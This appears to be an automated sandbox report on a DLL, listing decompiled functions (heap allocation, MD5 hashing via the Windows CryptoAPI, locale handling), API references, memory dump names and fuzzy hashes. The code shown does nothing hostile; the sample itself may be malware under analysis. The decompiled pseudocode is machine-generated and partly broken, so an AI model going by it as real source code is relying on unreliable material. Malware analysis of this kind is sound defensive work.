0x6da658ae
0x6da658ae
0x6da658af
0x6da658bb

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6DA65858
GetFileType.KERNELBASE(00000000), ref: 6DA6586A

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 36ba8a1afc0982a2f3876236b40db2d2fe2e67ea7a672fadec99d32649d7d52c
Instruction ID: c66414e0f015bd929d381bcfc7ec8e6fa36f29726829829819af5e86cf779009
Opcode Fuzzy Hash: 36ba8a1afc0982a2f3876236b40db2d2fe2e67ea7a672fadec99d32649d7d52c
Instruction Fuzzy Hash: F411847551C7D3C6C7304D3E88847327AA4A787230BA80B1ED5B6869F2C734D4C6E765

Uniqueness

Uniqueness Score: -1.00%

Function 6DA6458B Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6DA6458B(long _a4) {
				void* _t4;
				void* _t6;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6DA60403())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6daa5c48, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6DA6CB07();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E6DA611A2(__eflags, _t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x6da64591
0x6da64597
0x6da645c9
0x6da645ce
0x6da645d4
0x00000000
0x6da645d4
0x6da6459b
0x6da6459d
0x6da6459d
0x6da645b4
0x6da645bd
0x6da645c5
0x00000000
0x00000000
0x6da645a5
0x6da645a7
0x00000000
0x00000000
0x6da645aa
0x6da645b0
0x6da645b2
0x00000000
0x00000000
0x6da645b2
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6DA645BD

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5af7965534a223418343db5561efc4c54724426d34d5a1a3d32c61705ad6161b
Instruction ID: d318faba130f5503551ec304bf7058be1ec934cb7cb4a6888f112cfcf8e09a62
Opcode Fuzzy Hash: 5af7965534a223418343db5561efc4c54724426d34d5a1a3d32c61705ad6161b
Instruction Fuzzy Hash: EBE0E53914C3A3E6EB111A6ADC24B6A7A58EF4B2B4F064210EC24A6084EBD0CCC181F4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6DA52E60 Relevance: 21.3, APIs: 14, Instructions: 344
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E6DA52E60(void* __ebx, int* __ecx, signed int __edx, void* __edi, intOrPtr _a4) {
				int _v8;
				intOrPtr _v16;
				int _v20;
				long* _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				int _v52;
				signed int _v56;
				int* _v60;
				int _v64;
				int _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v148;
				signed char _v164;
				void _v168;
				intOrPtr* _v180;
				signed int* _v192;
				signed int* _v196;
				signed int* _v208;
				signed int* _v212;
				char _v224;
				char _v228;
				int _v348;
				intOrPtr _v356;
				void* __esi;
				void* __ebp;
				int* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t158;
				void* _t173;
				intOrPtr _t183;
				signed int _t193;
				signed int _t198;
				signed int _t203;
				signed int _t206;
				signed int _t212;
				intOrPtr _t214;
				signed int _t220;
				signed int _t228;
				signed char _t235;
				int* _t237;
				signed int _t240;
				signed int _t242;
				intOrPtr* _t246;
				void* _t248;
				void* _t249;
				intOrPtr _t251;
				intOrPtr _t252;
				void* _t255;

				_t234 = __edx;
				_push(0xffffffff);
				_push(E6DA72401);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t251;
				_t252 = _t251 - 0xd8;
				_push(__edi);
				_t237 = __ecx;
				_v60 = __ecx;
				_t242 = __edx;
				_v64 = 0;
				_v24 = 0;
				if(CryptAcquireContextA( &_v24, 0, 0, 0x18, 0xf0000000) == 0) {
					L5:
					 *_t237 = 0;
					_t237[4] = 0;
					_push(0);
					_t237[5] = 0xf;
					 *_t237 = 0;
					E6DA51770(_t237, 0x6da7f2c7);
					 *[fs:0x0] = _v16;
					return _t237;
				} else {
					_t136 =  &_v20;
					_v20 = 0;
					__imp__CryptCreateHash(_v24, 0x8003, 0, 0, _t136);
					_push(0);
					if(_t136 == 0) {
						L4:
						CryptReleaseContext(_v24);
						goto L5;
					} else {
						__imp__CryptHashData(_v20, _t242, _a4);
						if(_t136 != 0) {
							_v32 = 0;
							_t139 =  &_v32;
							_v52 = 4;
							__imp__CryptGetHashParam(_v20, 4, _t139,  &_v52, 0);
							__eflags = _t139;
							if(_t139 == 0) {
								goto L3;
							} else {
								_t212 = _v32;
								_t206 = 0;
								_v56 = _t212;
								_t244 = 0;
								_v48 = 0;
								_v28 = 0;
								_v44 = 0;
								_v40 = 0;
								_v36 = 0;
								__eflags = _t212;
								if(_t212 == 0) {
									L15:
									_t141 =  &_v32;
									_v8 = 0;
									__imp__CryptGetHashParam(_v20, 2, _t206, _t141, 0);
									__eflags = _t141;
									if(__eflags != 0) {
										E6DA53BD0( &_v228, __eflags, _t212);
										_t244 = _t206;
										_v8 = 1;
										__eflags = _t244 - _v28;
										if(_t244 != _v28) {
											_t240 = _v28;
											asm("o16 nop [eax+eax]");
											do {
												 *((char*)(_t249 +  *((intOrPtr*)(_v228 + 4)) - 0xa0)) = 0x30;
												_t183 =  *((intOrPtr*)(_v228 + 4));
												 *((intOrPtr*)(_t249 + _t183 - 0xc0)) = 2;
												 *(_t249 + _t183 - 0xbc) = 0;
												 *( &_v208 +  *((intOrPtr*)(_v228 + 4))) =  *( &_v208 +  *((intOrPtr*)(_v228 + 4))) & 0xfffff9ff | 0x00000800;
												E6DA53E00( &_v228, _t234,  *_t244 & 0x000000ff);
												_t244 = _t244 + 1;
												__eflags = _t244 - _t240;
											} while (_t244 != _t240);
											_t237 = _v60;
										}
										__imp__CryptDestroyHash(_v20);
										CryptReleaseContext(_v24, 0);
										_v8 = 2;
										asm("xorps xmm0, xmm0");
										_t235 = _v164;
										 *_t237 = 0;
										_t237[4] = 0;
										_t237[5] = 0xf;
										 *_t237 = 0;
										_v64 = 4;
										asm("movq [ebp-0x48], xmm0");
										_v68 = 0;
										__eflags = (_t235 & 0x00000022) - 2;
										if((_t235 & 0x00000022) == 2) {
											L28:
											__eflags = _t235 & 0x00000004;
											if((_t235 & 0x00000004) != 0) {
												L31:
												_t214 = _v72;
												_t234 = _v76;
											} else {
												_t244 =  *_v196;
												__eflags = _t244;
												if(_t244 == 0) {
													goto L31;
												} else {
													_t234 =  *_v212;
													_t214 =  *_v180 - _t234 + _t244;
												}
											}
										} else {
											_t228 =  *_v192;
											__eflags = _t228;
											if(_t228 == 0) {
												goto L28;
											} else {
												__eflags = _t228 - _v168;
												_t229 =  <  ? _v168 : _t228;
												_t234 =  *_v208;
												_t214 = ( <  ? _v168 : _t228) - _t234;
											}
										}
										__eflags = _t234;
										if(_t234 != 0) {
											_push(_t214);
											E6DA51770(_t237, _t234);
										}
										_v8 = 1;
										 *((intOrPtr*)(_t249 +  *((intOrPtr*)(_v228 + 4)) - 0xe0)) = 0x6da7f3a8;
										_t90 = _v228 + 4; // 0x74736f69
										_t91 =  *_t90 - 0x50; // 0x74736f19
										 *((intOrPtr*)(_t249 +  *_t90 - 0xe4)) = _t91;
										E6DA53840( &_v224, _t244);
										_t96 = _v228 + 4; // 0x74736f69
										 *((intOrPtr*)(_t249 +  *_t96 - 0xe0)) = 0x6da7f448;
										_t100 = _v228 + 4; // 0x6da8006c
										_t101 =  *_t100 - 8; // 0x6da80064
										 *((intOrPtr*)(_t249 +  *_t100 - 0xe4)) = _t101;
										_v8 = 3;
										_v148 = 0x6da7f3c8;
										E6DA58D06( &_v148);
										_t252 = _t252 + 4;
										__eflags = _t206;
										if(_t206 == 0) {
											goto L39;
										} else {
											_t158 = _t206;
											_t220 = _v40 - _t206;
											__eflags = _t220 - 0x1000;
											if(_t220 < 0x1000) {
												L37:
												_push(_t220);
												_push(_t206);
												goto L38;
											} else {
												_t206 =  *(_t206 - 4);
												_t220 = _t220 + 0x23;
												__eflags = _t158 - _t206 + 0xfffffffc - 0x1f;
												if(_t158 - _t206 + 0xfffffffc > 0x1f) {
													goto L42;
												} else {
													goto L37;
												}
											}
										}
									} else {
										__imp__CryptDestroyHash(_v20);
										CryptReleaseContext(_v24, 0);
										_push(0);
										 *_t237 = 0;
										_t237[4] = 0;
										_t237[5] = 0xf;
										 *_t237 = 0;
										E6DA51770(_t237, 0x6da7f2c7);
										_t193 = _v36;
										__eflags = _t193;
										if(_t193 == 0) {
											L39:
											 *[fs:0x0] = _v16;
											return _t237;
										} else {
											_t248 = _t244 - _t193;
											__eflags = _t248 - 0x1000;
											if(_t248 < 0x1000) {
												L20:
												_push(_t248);
												_push(_t193);
												L38:
												E6DA593C9();
												goto L39;
											} else {
												_t220 =  *(_t193 - 4);
												_t244 = _t248 + 0x23;
												__eflags = _t193 - _t220 + 0xfffffffc - 0x1f;
												if(_t193 - _t220 + 0xfffffffc > 0x1f) {
													goto L42;
												} else {
													_t193 = _t220;
													goto L20;
												}
											}
										}
									}
								} else {
									__eflags = _t212 - 0x7fffffff;
									if(_t212 > 0x7fffffff) {
										E6DA519E0(_t212);
										goto L41;
									} else {
										__eflags = _t212 - 0x1000;
										if(__eflags < 0) {
											_t198 = E6DA59399(_t237, 0, __eflags, _t212);
											_t255 = _t252 + 4;
											_t206 = _t198;
											goto L14;
										} else {
											_t27 = _t212 + 0x23; // 0x23
											_t202 = _t27;
											__eflags = _t27 - _t212;
											if(__eflags <= 0) {
												L41:
												E6DA51420();
												goto L42;
											} else {
												_t203 = E6DA59399(_t237, 0, __eflags, _t202);
												_t252 = _t252 + 4;
												__eflags = _t203;
												if(_t203 == 0) {
													L42:
													E6DA5DACF(_t206, _t220, _t234);
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_push(_t249);
													_push(0xffffffff);
													_push(E6DA723C0);
													_push( *[fs:0x0]);
													 *[fs:0x0] = _t252;
													_t246 = _t220 + 0x50;
													 *((intOrPtr*)( *((intOrPtr*)( *_t220 + 4)) + _t246 - 0x50)) = 0x6da7f3a8;
													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t246 - 0x50)) + 4)) + _t246 - 0x54)) =  *((intOrPtr*)( *((intOrPtr*)(_t246 - 0x50)) + 4)) - 0x50;
													E6DA53840(_t246 - 0x4c, _t246, _t244);
													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t246 - 0x50)) + 4)) + _t246 - 0x50)) = 0x6da7f448;
													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t246 - 0x50)) + 4)) + _t246 - 0x54)) =  *((intOrPtr*)( *((intOrPtr*)(_t246 - 0x50)) + 4)) - 8;
													_v348 = 0;
													 *_t246 = 0x6da7f3c8;
													_t173 = E6DA58D06(_t246);
													 *[fs:0x0] = _v356;
													return _t173;
												} else {
													_t28 = _t203 + 0x23; // 0x23
													_t206 = _t28 & 0xffffffe0;
													 *(_t206 - 4) = _t203;
													L14:
													_t212 = _t206 + _v56;
													_v48 = _t206;
													_t244 = _t212;
													_v28 = _t212;
													_v40 = _t244;
													E6DA5B0A0(_t237, _t206, 0, _v56);
													_v36 = _t206;
													_t252 = _t255 + 0xc;
													_v44 = _t244;
													goto L15;
												}
											}
										}
									}
								}
							}
						} else {
							L3:
							__imp__CryptDestroyHash(_v20);
							_push(0);
							goto L4;
						}
					}
				}
			}

0x6da52e60
0x6da52e63
0x6da52e65
0x6da52e70
0x6da52e71
0x6da52e78
0x6da52e80
0x6da52e8a
0x6da52e8f
0x6da52e92
0x6da52e96
0x6da52e9e
0x6da52ead
0x6da52ef7
0x6da52ef7
0x6da52eff
0x6da52f06
0x6da52f08
0x6da52f14
0x6da52f17
0x6da52f21
0x6da52f2e
0x6da52eaf
0x6da52eaf
0x6da52eb2
0x6da52ec6
0x6da52ecc
0x6da52ed0
0x6da52eee
0x6da52ef1
0x00000000
0x6da52ed2
0x6da52ed9
0x6da52ee1
0x6da52f34
0x6da52f3c
0x6da52f3f
0x6da52f4c
0x6da52f52
0x6da52f54
0x00000000
0x6da52f56
0x6da52f56
0x6da52f5b
0x6da52f5d
0x6da52f60
0x6da52f62
0x6da52f65
0x6da52f68
0x6da52f6b
0x6da52f6e
0x6da52f71
0x6da52f73
0x6da52fe0
0x6da52fe2
0x6da52fe5
0x6da52ff3
0x6da52ff9
0x6da52ffb
0x6da5306f
0x6da53074
0x6da53076
0x6da5307a
0x6da5307d
0x6da5307f
0x6da53086
0x6da53090
0x6da5309f
0x6da530ad
0x6da530b0
0x6da530bb
0x6da530dd
0x6da530e9
0x6da530ee
0x6da530ef
0x6da530ef
0x6da530f3
0x6da530f3
0x6da530f9
0x6da53104
0x6da5310a
0x6da5310e
0x6da53111
0x6da5311b
0x6da53121
0x6da53128
0x6da5312f
0x6da53132
0x6da53139
0x6da5313e
0x6da53145
0x6da53147
0x6da5316e
0x6da5316e
0x6da53171
0x6da53195
0x6da53195
0x6da53198
0x6da53173
0x6da53179
0x6da5317b
0x6da5317d
0x00000000
0x6da5317f
0x6da53185
0x6da53191
0x6da53191
0x6da5317d
0x6da53149
0x6da5314f
0x6da53151
0x6da53153
0x00000000
0x6da53155
0x6da5315b
0x6da53161
0x6da53168
0x6da5316a
0x6da5316a
0x6da53153
0x6da5319b
0x6da5319d
0x6da5319f
0x6da531a3
0x6da531a3
0x6da531a8
0x6da531b8
0x6da531c9
0x6da531cc
0x6da531cf
0x6da531dc
0x6da531e7
0x6da531ea
0x6da531fb
0x6da531fe
0x6da53201
0x6da5320e
0x6da53213
0x6da5321d
0x6da53222
0x6da53225
0x6da53227
0x00000000
0x6da53229
0x6da5322c
0x6da5322e
0x6da53230
0x6da53236
0x6da53248
0x6da53248
0x6da53249
0x00000000
0x6da53238
0x6da53238
0x6da5323b
0x6da53243
0x6da53246
0x00000000
0x00000000
0x00000000
0x00000000
0x6da53246
0x6da53236
0x6da52ffd
0x6da53000
0x6da5300b
0x6da53011
0x6da53013
0x6da5301b
0x6da53022
0x6da5302e
0x6da53031
0x6da53036
0x6da53039
0x6da5303b
0x6da53252
0x6da53259
0x6da53264
0x6da53041
0x6da53041
0x6da53043
0x6da53049
0x6da53061
0x6da53061
0x6da53062
0x6da5324a
0x6da5324a
0x00000000
0x6da5304b
0x6da5304b
0x6da5304e
0x6da53056
0x6da53059
0x00000000
0x6da5305f
0x6da5305f
0x00000000
0x6da5305f
0x6da53059
0x6da53049
0x6da5303b
0x6da52f75
0x6da52f75
0x6da52f7b
0x6da53265
0x00000000
0x6da52f81
0x6da52f81
0x6da52f87
0x6da52fb1
0x6da52fb6
0x6da52fb9
0x00000000
0x6da52f89
0x6da52f89
0x6da52f89
0x6da52f8c
0x6da52f8e
0x6da5326a
0x6da5326a
0x00000000
0x6da52f94
0x6da52f95
0x6da52f9a
0x6da52f9d
0x6da52f9f
0x6da5326f
0x6da5326f
0x6da53274
0x6da53275
0x6da53276
0x6da53277
0x6da53278
0x6da53279
0x6da5327a
0x6da5327b
0x6da5327c
0x6da5327d
0x6da5327e
0x6da5327f
0x6da53280
0x6da53289
0x6da5328b
0x6da53290
0x6da53291
0x6da5329b
0x6da532a1
0x6da532b2
0x6da532b9
0x6da532c4
0x6da532d5
0x6da532d9
0x6da532e1
0x6da532e7
0x6da532f2
0x6da532fd
0x6da52fa5
0x6da52fa5
0x6da52fa8
0x6da52fab
0x6da52fbb
0x6da52fc2
0x6da52fc5
0x6da52fc8
0x6da52fca
0x6da52fcd
0x6da52fd0
0x6da52fd7
0x6da52fda
0x6da52fdd
0x00000000
0x6da52fdd
0x6da52f9f
0x6da52f8e
0x6da52f87
0x6da52f7b
0x6da52f73
0x6da52ee3
0x6da52ee3
0x6da52ee6
0x6da52eec
0x00000000
0x6da52eec
0x6da52ee1
0x6da52ed0

APIs

CryptAcquireContextA.ADVAPI32(000000FF,00000000,00000000,00000018,F0000000,00000000,6DAA48E8,00000000), ref: 6DA52EA5
CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 6DA52EC6
CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 6DA52ED9
CryptDestroyHash.ADVAPI32(00000000), ref: 6DA52EE6
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6DA52EF1
CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,?,00000000), ref: 6DA52F4C
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 6DA52FF3
CryptDestroyHash.ADVAPI32(00000000), ref: 6DA53000
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6DA5300B
CryptDestroyHash.ADVAPI32(00000000), ref: 6DA530F9
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6DA53104
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6DA5321D
Concurrency::cancel_current_task.LIBCPMT ref: 6DA5326A
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6DA532E7

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: Crypt$Hash$Context$DestroyRelease$Ios_base_dtorParamstd::ios_base::_$AcquireConcurrency::cancel_current_taskCreateData
String ID:
API String ID: 1151079929-0
Opcode ID: e8f129075b8cab65d2b15f2e6703d1e85c3448439a9dd24b458f222fe68e3afd
Instruction ID: a97ffd1c5aa23b74ee9c14611929d8efa64af28a8c6d16c0dab24d27e75dd9c6
Opcode Fuzzy Hash: e8f129075b8cab65d2b15f2e6703d1e85c3448439a9dd24b458f222fe68e3afd
Instruction Fuzzy Hash: 59D1D175A08209DFEB20CF68CD44BAEBBB4FF49304F1441A9E905AB390D775A994CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6DA6BFAE Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E6DA6BFAE(void* __ecx, void* __edx, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t77;
				intOrPtr* _t84;
				short* _t87;
				void* _t89;
				intOrPtr* _t92;
				intOrPtr* _t96;
				signed int _t114;
				void* _t115;
				intOrPtr* _t117;
				intOrPtr _t119;
				signed int* _t120;
				void* _t121;
				void* _t122;
				intOrPtr* _t123;
				signed short _t125;
				int _t127;
				void* _t128;
				void* _t131;
				signed int _t132;

				_push(__ecx);
				_push(__ecx);
				_push(_t122);
				_t117 = _a4;
				_t33 = E6DA62BDC(__ecx, __edx, _t122);
				_t114 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t123 = _t3;
				_t4 = _t123 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t123 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t123 + 4; // 0x54
				_t84 = _t6;
				_v8 = _t34;
				_t92 = _t117;
				_t35 = _t117 + 0x80;
				 *_t123 = _t117;
				 *_t84 = _t35;
				if( *_t35 != 0) {
					E6DA6BF41(0x6da78460, 0x16, _t84);
					_t92 =  *_t123;
					_t131 = _t131 + 0xc;
					_t114 = 0;
				}
				_push(_t123);
				if( *_t92 == _t114) {
					E6DA6B8B2(_t84, _t92);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t84)) == _t114) {
						E6DA6B9D2();
					} else {
						E6DA6B939(_t92);
					}
					if( *((intOrPtr*)(_t123 + 8)) == 0) {
						_t77 = E6DA6BF41(0x6da78150, 0x40, _t123);
						_t131 = _t131 + 0xc;
						if(_t77 != 0) {
							_push(_t123);
							if( *((intOrPtr*)( *_t84)) == 0) {
								E6DA6B9D2();
							} else {
								E6DA6B939(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t123 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t117 + 0x100;
					if( *_t117 != 0 ||  *_t38 != 0) {
						_t39 = E6DA6BDFE(_t38, _t123);
					} else {
						_t39 = GetACP();
					}
					_t125 = _t39;
					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t125;
						}
						_t119 = _a12;
						if(_t119 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t96 = _v8;
							_t15 = _t119 + 0x120; // 0xd0
							_t87 = _t15;
							 *_t87 = 0;
							_t16 = _t96 + 2; // 0x6
							_t115 = _t16;
							do {
								_t45 =  *_t96;
								_t96 = _t96 + 2;
							} while (_t45 != _v12);
							_t18 = (_t96 - _t115 >> 1) + 1; // 0x3
							_t47 = E6DA6B800(_t96 - _t115 >> 1, _t87, 0x55, _v8);
							_t132 = _t131 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E6DA5DAEC();
								asm("int3");
								_t130 = _t132;
								_t50 =  *0x6da83014; // 0xa0d58914
								_v52 = _t50 ^ _t132;
								_push(_t87);
								_push(_t125);
								_t126 = _v40;
								_push(_t119);
								_t52 = E6DA62BDC(_t98, _t115, _v40);
								_t88 = _t52;
								_t120 =  *(E6DA62BDC(_t98, _t115, _v40) + 0x34c);
								_t127 = E6DA6C6E9(_t126);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E6DA690B4(_t120, _t127,  *((intOrPtr*)(_t88 + 0x54)),  &_v252) == 0 && E6DA6C81E(_t127) != 0) {
										 *_t120 =  *_t120 | 0x00000004;
										_t120[2] = _t127;
										_t120[1] = _t127;
									}
									_t62 =  !( *_t120 >> 2) & 0x00000001;
								} else {
									 *_t120 =  *_t120 & _t56;
									_t62 = _t56 + 1;
								}
								_pop(_t121);
								_pop(_t128);
								_pop(_t89);
								return E6DA59B91(_t62, _t89, _v12 ^ _t130, _t115, _t121, _t128);
							} else {
								if(E6DA66812(_t87, 0x1001, _t119, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t119 + 0x80; // 0x30
									_t87 = _t20;
									_t21 = _t119 + 0x120; // 0xd0
									if(E6DA66812(_t21, 0x1002, _t87, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t68 = E6DA721B7(_t98);
										_t98 = _t87;
										if(_t68 != 0) {
											L31:
											_t22 = _t119 + 0x120; // 0xd0
											if(E6DA66812(_t22, 7, _t87, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t73 = E6DA721B7(_t98);
											_t98 = _t87;
											if(_t73 == 0) {
												L32:
												_t119 = _t119 + 0x100;
												if(_t125 != 0xfde9) {
													E6DA70752(_t98, _t125, _t119, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t72 = E6DA6B800(_t98, _t119, 0x10, L"utf8");
													_t132 = _t132 + 0x10;
													if(_t72 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x6da6bfb3
0x6da6bfb4
0x6da6bfb6
0x6da6bfb8
0x6da6bfbb
0x6da6bfc2
0x6da6bfc4
0x6da6bfc7
0x6da6bfc7
0x6da6bfca
0x6da6bfca
0x6da6bfd0
0x6da6bfd3
0x6da6bfd6
0x6da6bfd6
0x6da6bfd9
0x6da6bfdc
0x6da6bfde
0x6da6bfe4
0x6da6bfe6
0x6da6bfeb
0x6da6bff5
0x6da6bffa
0x6da6bffc
0x6da6bfff
0x6da6bfff
0x6da6c001
0x6da6c005
0x6da6c04e
0x00000000
0x6da6c007
0x6da6c00c
0x6da6c015
0x6da6c00e
0x6da6c00e
0x6da6c00e
0x6da6c020
0x6da6c02a
0x6da6c02f
0x6da6c034
0x6da6c03a
0x6da6c03e
0x6da6c047
0x6da6c040
0x6da6c040
0x6da6c040
0x6da6c053
0x6da6c053
0x6da6c034
0x6da6c020
0x6da6c059
0x6da6c195
0x6da6c195
0x00000000
0x6da6c05f
0x6da6c05f
0x6da6c068
0x6da6c079
0x6da6c06f
0x6da6c06f
0x6da6c06f
0x6da6c080
0x6da6c084
0x00000000
0x6da6c0a8
0x6da6c0a8
0x6da6c0ad
0x6da6c0af
0x6da6c0af
0x6da6c0b1
0x6da6c0b6
0x6da6c190
0x6da6c192
0x6da6c197
0x6da6c19b
0x6da6c0bc
0x6da6c0bc
0x6da6c0bf
0x6da6c0bf
0x6da6c0c7
0x6da6c0ca
0x6da6c0ca
0x6da6c0cd
0x6da6c0cd
0x6da6c0d0
0x6da6c0d3
0x6da6c0dd
0x6da6c0e7
0x6da6c0ec
0x6da6c0f1
0x6da6c19c
0x6da6c19e
0x6da6c19f
0x6da6c1a0
0x6da6c1a1
0x6da6c1a2
0x6da6c1a3
0x6da6c1a8
0x6da6c1ac
0x6da6c1b4
0x6da6c1bb
0x6da6c1be
0x6da6c1bf
0x6da6c1c0
0x6da6c1c3
0x6da6c1c4
0x6da6c1c9
0x6da6c1d1
0x6da6c1e0
0x6da6c1ec
0x6da6c1fd
0x6da6c205
0x6da6c21f
0x6da6c22c
0x6da6c22f
0x6da6c232
0x6da6c232
0x6da6c23c
0x6da6c207
0x6da6c207
0x6da6c209
0x6da6c209
0x6da6c242
0x6da6c243
0x6da6c246
0x6da6c24d
0x6da6c0f7
0x6da6c107
0x00000000
0x6da6c10d
0x6da6c10f
0x6da6c10f
0x6da6c11b
0x6da6c129
0x00000000
0x6da6c12b
0x6da6c12b
0x6da6c12e
0x6da6c134
0x6da6c137
0x6da6c147
0x6da6c14c
0x6da6c15a
0x00000000
0x00000000
0x00000000
0x00000000
0x6da6c139
0x6da6c139
0x6da6c13c
0x6da6c142
0x6da6c145
0x6da6c15c
0x6da6c15c
0x6da6c168
0x6da6c188
0x00000000
0x6da6c16a
0x6da6c16a
0x6da6c174
0x6da6c179
0x6da6c17e
0x00000000
0x6da6c180
0x00000000
0x6da6c180
0x6da6c17e
0x00000000
0x00000000
0x00000000
0x6da6c145
0x6da6c137
0x6da6c129
0x6da6c107
0x6da6c0f1
0x6da6c0b6
0x6da6c084

APIs

Part of subcall function 6DA62BDC: GetLastError.KERNEL32(?,00000008,6DA68ED9), ref: 6DA62BE0
